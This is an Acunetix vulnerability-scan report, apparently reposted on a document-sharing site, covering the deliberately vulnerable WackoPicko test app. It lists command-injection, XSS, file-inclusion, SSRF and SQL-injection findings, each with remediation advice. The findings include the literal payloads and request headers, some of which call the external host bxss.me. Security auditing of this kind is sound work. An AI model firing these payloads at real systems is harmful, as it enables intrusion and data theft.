Developer: Acunetix Security Audit

Developer
Report
Acunetix Security Audit
09 June 2020
Generated by Acunetix
Selected vulnerabilities
Scan details
Scan information
Start url http://192.168.1.124/WackoPicko/
Host http://192.168.1.124/
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Total alerts found 11

High 11
Medium 0
Low 0
Informational 0
Alerts summary
Code execution
Classification
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-94
Affected items Variation
/WackoPicko/passcheck.php 1
Cross site scripting
Classification
Base Score: 6.4
Access Complexity: Low
Base Score: 5.3
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
CWE CWE-79
/WackoPicko/guestbook.php 1
/WackoPicko/pictures/search.php 1
/WackoPicko/users/login.php 1
File inclusion
Classification
Base Score: 7.5
CWE CWE-20
/WackoPicko/admin/index.php 2
Remote file inclusion XSS
Classification
Base Score: 6.4
Base Score: 5.3
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
CWE CWE-79
SQL injection
Classification
Base Score: 6.8
Base Score: 10.0
Scope: Changed
CWE CWE-89
/WackoPicko/users/login.php 1
Server side request forgery
Classification
Base Score: 5.8
Base Score: 9.0
Attack Complexity: High
Scope: Changed
Availability Impact: High
CWE CWE-918
Alerts details
Code execution
Severity High
Reported by module /Scripts/PerScheme/Code_Execution.script
Description
This script is possibly vulnerable to code execution attacks.
Code injection vulnerabilities occur where the output or content served from a Web application can be manipulated in such
a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-
side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting
language of the application itself.
Impact
A malicious user may execute arbitrary system commands with the permissions of the web server.
Recommendation
Your script should filter metacharacters from user input.
References
Security Focus - Penetration Testing for Web Applications (Part Two)

(http://www.symantec.com/connect/articles/penetration-testing-web-applications-part-two)
OWASP PHP Top 5 (http://www.owasp.org/index.php/PHP_Top_5)
Affected items
/WackoPicko/passcheck.php
Details
URL encoded POST input password was set to $(nslookup hitcHBX8q1QN7f0d6f.bxss.me)
Possible execution result:
The bxss.me domain hitcHBX8q1QN7f0d6f.bxss.me was resolved.
Request headers
POST /WackoPicko/passcheck.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 51
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
password=%24(nslookup%20hitcHBX8q1QN7f0d6f.bxss.me)
Cross site scripting
Severity High
Reported by module /Scripts/PerScheme/XSS.script
Description
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.
Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.
Recommendation
Apply context-dependent encoding and/or validation to user input rendered on a page
References
Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)

Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)
Cross-site Scripting - OWASP (http://www.owasp.org/index.php/Cross_Site_Scripting)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)
Cross site scripting (http://en.wikipedia.org/wiki/Cross-site_scripting )
Affected items
/WackoPicko/guestbook.php
Verified vulnerability
Details
URL encoded POST input comment was set to 555'"()&%<acx><ScRiPt >EVua(9983)</ScRiPt>
Request headers
POST /WackoPicko/guestbook.php HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Accept: */*
Content-Length: 70
Host: 192.168.1.124
comment=555'"()%26%25<acx><ScRiPt%20>EVua(9983)</ScRiPt>&name=UHOdllxh
/WackoPicko/pictures/search.php
Details
URL encoded GET input query was set to 1'"()&%<acx><ScRiPt >wU91(9983)</ScRiPt>
Request headers
GET /WackoPicko/pictures/search.php?query=1'"()%26%25<acx><ScRiPt%20>wU91(9983)</ScRiPt>
HTTP/1.1
Accept: */*
Host: 192.168.1.124
/WackoPicko/users/login.php
Details
URL encoded POST input username was set to UHOdllxh'"()&%<acx><ScRiPt >XCbr(9711)</ScRiPt>
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Accept: */*
Content-Length: 88
Host: 192.168.1.124
password=g00dPa%24%24w0rD&username=UHOdllxh'"()%26%25<acx><ScRiPt%20>XCbr(9711)</ScRiPt>
File inclusion
Severity High
Reported by module /Scripts/PerScheme/File_Inclusion.script
Description
This script is possibly vulnerable to file inclusion attacks.
It seems that this script includes a file which name is determined using user-supplied data. This data is not properly
validated before being passed to the include function.
Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with
the privileges of the web-server.
Recommendation
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of
accepted filenames and restrict the input to that list.
For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file
using a URL rather than a local file path. It is recommended to disable this option from php.ini.
References
PHP - Using remote files (http://www.php.net/manual/en/features.remote-files.php)

Remote file inclusion (http://en.wikipedia.org/wiki/Remote_file_inclusion)
Affected items
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Accept: */*
Content-Length: 41
Host: 192.168.1.124
adminname=g00dPa%24%24w0rD&password=login
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Accept: */*
Host: 192.168.1.124
Remote file inclusion XSS
Severity High
Reported by module /Scripts/PerScheme/Remote_File_Inclusion_XSS.script
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the
form of Javascript) to another user. The server opens arbitrary URLs and puts the content retrieved from the URL into the
response without filtering.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
Your server side code should verify if the URL from the user input is allowed to be retrieved and displayed or filter the
response from the URL according to the context in which it is displayed.
References
Acunetix Cross Site Scripting Attack (http://www.acunetix.com/websitesecurity/cross-site-scripting.htm)

VIDEO: How Cross-Site Scripting (XSS) Works (http://www.acunetix.com/blog/web-security-zone/video-how-cross-site-
scripting-xss-works/)
The Cross Site Scripting Faq (http://www.cgisecurity.com/xss-faq.html)
OWASP Cross Site Scripting (http://www.owasp.org/index.php/Cross_Site_Scripting)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Cross site scripting (http://en.wikipedia.org/wiki/Cross-site_scripting )
How To: Prevent Cross-Site Scripting in ASP.NET (http://msdn.microsoft.com/en-us/library/ms998274.aspx)
Affected items
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
POST /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Accept: */*
Content-Length: 41
Host: 192.168.1.124
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
GET /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Accept: */*
Host: 192.168.1.124
SQL injection
Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script
Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.
Impact
An attacker can use SQL injection it to bypass a web application's authentication and authorization mechanisms and
retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database,
affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands,
which may then be used to escalate an attack even further.
Recommendation
Use parameterized queries when dealing with SQL queries that contains user input. Parameterized queries allows the
database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.
References
SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection/)

Types of SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection2/)
Prevent SQL injection vulnerabilities in PHP applications and fix them - Acunetix
(https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/)
SQL Injection - OWASP (https://www.owasp.org/index.php/SQL_Injection)
Bobby Tables: A guide to preventing SQL injection (http://bobby-tables.com/)
SQL Injection Cheet Sheets - Pentestmonkey (http://pentestmonkey.net/category/cheat-sheet/sql-injection)
Affected items
/WackoPicko/users/login.php
Details
URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select
concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(57),CHAR(67),CHAR(121),CHAR(52),CHAR(79),CHAR(5
0),CHAR(69)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a)and'
Injected pattern found:
4CuQ9Cy4O2E
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Accept: */*
Content-Length: 355
Host: 192.168.1.124
password=g00dPa%24%24w0rD&username='and(select%201%20from(select%20count(*)%2Cconcat((sel
ect%20concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(81)%2CCHAR(57)%2CCHAR(67)%2CCHAR(121)
%2CCHAR(52)%2CCHAR(79)%2CCHAR(50)%2CCHAR(69))%20from%20information_schema.tables%20limit%
200%2C1)%2Cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
Server side request forgery
Severity High
Reported by module /Scripts/PerScheme/Server_Side_Request_Forgery.script
Description
SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending
packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References
for more information about this problem.
Impact
The impact varies according to the affected server interface.
Recommendation
Your script should properly sanitize user input.
References
SSRF VS. BUSINESS-CRITICAL APPLICATIONS (https://media.blackhat.com/bh-us-

12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf)
Affected items
Details
URL encoded GET input page was set to http://hitm1YRhASIND.bxss.me/
An HTTP request was initiated for the domain hitm1YRhASIND.bxss.me which indicates that this script is vulnerable to
SSRF.
HTTP request details:
IP address: 179.8.237.20
User agent:
Request headers
POST /WackoPicko/admin/index.php?page=http://hitm1YRhASIND.bxss.me/ HTTP/1.1
Accept: */*
Content-Length: 41
Host: 192.168.1.124
Details
URL encoded GET input page was set to http://hitYWkgofMX4F.bxss.me/
An HTTP request was initiated for the domain hitYWkgofMX4F.bxss.me which indicates that this script is vulnerable to
SSRF.
HTTP request details:
IP address: 179.8.237.20
User agent:
Request headers
GET /WackoPicko/admin/index.php?page=http://hitYWkgofMX4F.bxss.me/ HTTP/1.1
Accept: */*
Host: 192.168.1.124
Scanned items (coverage report)
http://192.168.1.124/WackoPicko/admin/index.php
http://192.168.1.124/WackoPicko/guestbook.php
http://192.168.1.124/WackoPicko/passcheck.php
http://192.168.1.124/WackoPicko/pictures/search.php
http://192.168.1.124/WackoPicko/users/login.php

Developer: Acunetix Security Audit

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Developer: Acunetix Security Audit

Uploaded by

Copyright:

Available Formats

Developer

Acunetix Threat Level 3

Total alerts found 11

Cross site scripting

Remote file inclusion XSS

Server side request forgery

This script is possibly vulnerable to code execution attacks.

Your script should filter metacharacters from user input.

Security Focus - Penetration Testing for Web Applications (Part Two)

Possible execution result:

The bxss.me domain hitcHBX8q1QN7f0d6f.bxss.me was resolved.

Cross site scripting

Apply context-dependent encoding and/or validation to user input rendered on a page

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)

This script is possibly vulnerable to file inclusion attacks.

PHP - Using remote files (http://www.php.net/manual/en/features.remote-files.php)

Remote file inclusion XSS

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Acunetix Cross Site Scripting Attack (http://www.acunetix.com/websitesecurity/cross-site-scripting.htm)

SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection/)

Injected pattern found:

Server side request forgery

The impact varies according to the affected server interface.

Your script should properly sanitize user input.

SSRF VS. BUSINESS-CRITICAL APPLICATIONS (https://media.blackhat.com/bh-us-

HTTP request details:

HTTP request details:

You might also like